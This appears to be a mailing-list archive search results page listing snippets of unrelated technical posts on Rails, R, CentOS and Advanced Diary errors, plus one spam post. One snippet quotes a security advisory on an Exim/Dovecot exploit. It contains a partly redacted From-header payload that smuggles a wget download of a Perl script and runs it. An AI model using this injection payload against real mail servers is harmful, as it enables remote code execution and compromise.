similar to: Seek Error ?

Displaying 20 results from an estimated 3000 matches similar to: "Seek Error ?"

2006 Jul 24
18
difference between running unabridged
22 sudo mv camping.rb camping-abridged.rb 23 sudo mv camping-unabridged.rb camping.rb when running into problems, the abridged version of camping is rather difficult to debug. so I''m moving to unabridged, but I''m getting this error. [Mon Jul 24 15:50:18 2006] [error] [client 192.168.11.100]
2008 May 19
2
Log or diary file
Hi! Is it possible to set a file to which both commands and output would get automatically saved? I've tried with sink(), but only get the output. I mean something like a combined history and sink, as you get with File/Save to File.. in the windows GUI. Tis is done with diary filename in Matlab, and you can state diary on and diary off to control what is being saved to the file. Thanks Agus
2008 Mar 11
1
KOrganizer problems
My file/print/mail server is CentOS. My laptop is Mandriva 2008.0. I have smb shortcuts loaded by fstab to give instant access to my home directory and a data directory on the server. All was working well, after some initial problems with firewall and selinux, until yesterday. After finding from the logs that someone was trying to get into my imap server I decided that, although they
2007 Jul 13
2
error on running Advanced Diary v1.3
Advanced Diary (a simple calendar/journaling program)installed fine, but when I go to run it the splash screen for the program shows up then I get an error box that says: Error Creating Object. Please verify that Microsoft Data Access Components 2.1 or later have been properly installed. The program stops there. A google search turned up this a download page for MDAC 2.8 here:
2010 Oct 27
8
Advanced Diary.
Help me plz run Advanced Diary is 3.0.1 I install mMicrosoft MDAC and can run application, but get error "Provider cannot be found. It may not be proprely installed". How i can run it? =(
2005 Oct 19
4
ER strikes back
Hi Railers, A long, long, time ago, i made a Framework/CMS in php. There were two core models: Content and Content_type. Content_type was only a list of content types (as expected): new, article, etc. Content_type was not mandatory, but it allowed later to "deactivate" types of contents, for example. So then Content stored the common attributes/properties between the different content
2005 Nov 30
0
uninitialized constant Base (NameError) trying to use ActiveLdap
Hi group I''m trying to hook up my simple app to Active Directory. I''m following instructions posted on the website. Mainly http://wiki.rubyonrails.com/rails/pages/HowtoAuthenticateViaLdap and now also http://wiki.rubyonrails.com/rails/pages/ActiveLDAP. The two instructions seem to differ a little on how to configure (environment.rb). Both instructions break my app with an
2005 Feb 02
1
Error when changing from AR 1.0.1 to 1.6
Hello, I have the following output when changing form Active Record 1.0.1 to ActiveRecord 1.6: [error] C:/dev/ruby/lib/ruby/gems/1.8/gems/actionpack-1.4.0/lib/action_controller/support/dependencies.rb:24:in `depend_on'': uninitialized constant ActiveRecord::Mixins (ScriptError)\r [error] \tfrom
2006 Nov 29
6
Noob needs help installing backgroundrb on Windows XP
Hey Guys, In the readme for Backgroundrb it says that windows support has been depcreated for this version, but then it goes on to mention how to use it in Windows. So I''m not sure if it should be running on windows or not, so I''ll ask anyway. Also, I''m new to ruby and I''m also new to server administration, so I apologize if my questions are pretty
2007 Nov 01
1
Jonathan Parr presents www.libeldefense.com
www.libeldefense.com Yahoo! has immense reach. Without doubt, you must be in Yahoo. It can bring you up to 50% of your traffic or more! Fortunately, you can now get listed in Yahoo! in seven days for a cost of just $199 - often worthwhile. You should get back your investment in a matter of days. The most important thing is to have a domain name that is high on the alphabetic order (starts with a
2006 Jun 16
0
Rails under apache
My app is ready to roll out to my users and I''m switching over to the central apache server we use. I''ve got it accessing the right directory (via Alias, not VHost), but in my error_log I see this: [Fri Jun 16 11:44:32 2006] [error] [client 127.0.0.1] /home/site/rails/alerts/public/../config/boot.rb:7:in `require'': No such file to load -- pathname (LoadError) [Fri
2006 Oct 28
1
What determines the order of rows in a lattice barchart?
Hi, What determines the order of the rows in a barchart? Cheers, Geoff. Here is my code, and the data follows. If I have z in alpha order, the barchart is in some order I can't determine. I originally tried rownames(twater)~twater$Cat, but the chart wasn't in rownames(twater) order either. library(lattice) twater<-read.csv("totalwater.csv",strip.white=T)
2006 Apr 04
21
Rails on IIS
I just spent the last two days trying to get Rails on IIS to work with Windows 2003/IIS 6.0. I think I''ve finally got it working, but it took more googling than I care to describe. Now I''ve got a few questions: 1) Is there some ''official'' Rails on IIS guide on this site on another official ruby site that''s known to work well? 2) If not, can someone
2013 Jul 22
0
[LLVMdev] [RFC] Add warning capabilities in LLVM.
----- Original Message ----- > On Sat, Jul 20, 2013 at 9:15 PM, Chris Lattner <clattner at apple.com> > wrote: > > Sorry, just getting caught up on an old thread. I haven't been > > involved in discussions of this. > > > > On Jul 17, 2013, at 8:53 AM, Bob Wilson <bob.wilson at apple.com> > > wrote: > >> First, let me try to clarify my
2017 Jun 08
2
regular expression help
Dear All, My query is: Do we always need to use perl = TRUE option when doing ignore.case=TRUE? A small example : my_text = "RECOVERY OFFICER-II\nDEBTS RECOVERY TRIBUNAL-III\n RC No. 162/2015\nSBI VS RAMESH GUPTA.\n Dated: 01.03.2016 Item no.01\n Present: Ms. Sonakshi, the proxy counsel for Ms. Usha Singh, the counsel for ARCIL.\n None for the CDs.\n
2005 Jun 12
7
vpnc versus Shorewall problem
Hi everybody, I have been using Shorewall for quite a while now but I recently stumbled over a new setup that stopped me cold. I don''t know how to proceed: I have an ordinary GNU/Linux box (2.6.11) connected to a nonpublic network with one interface eth0 which gets an IP through DHCP like 172.17.x.y. Traffic is not routed to the Internet in this subnet. In order to connect to the
2006 Mar 07
1
has_and_belongs_to_many tags
I''m trying to create a search where I can find pages by their tag name. Here''s a sample of my code (not working). @tags = Page.find(:all, :conditions => ["#{:tag.name} LIKE ?",''%'' + @params[''searchtags''] + ''%'' ]) My enviroment: I''ve got a table called tags, and a table called pages, both with a
2013 Jun 09
1
from ISC: Exim/Dovecot exploit making the rounds
One of our readers wrote in to let us know that he had received an attempted Exim/Dovecot exploit attempt against his email server. The exploit partially looked like this: From: x`wget${IFS}-O${IFS}/tmp/crew.pl${IFS}50.xx.xx.xx/dc.txt``perl${IFS}/tmp/crew.pl`@blaat.com (Obviously edited for your safety, and I didn't post the whole thing.) This is an exploit against Dovecot that is using
2008 Nov 04
1
nfs and permissions
My CentOS box is my server for data and some services, including nfs shares. On my laptop I have folderviews displaying two directories on the server, via nfs mounts. An fstab line mounts each, such as: 192.168.0.40:/home /mnt/borg2_home nfs nosuid,exec,rw,bg,soft,intr 0 0 From the folderview I have no problem accessing the files and directories. Now comes the problem. I use kontact, with
2002 Oct 10
1
CRAN mirror
Hi how I must make to officialize my mirror in the main R website? My CRAN's mirror is sited in Federal University of Vi?osa in Minas Gerais State - Brazil. The address is: http://www.termix.ufv.br/CRAN It is diary updated Bie Ronaldo -- Q: How does a hacker fix a function which doesn't work for all of the elements in its domain? A: He changes the domain. -- | //|\\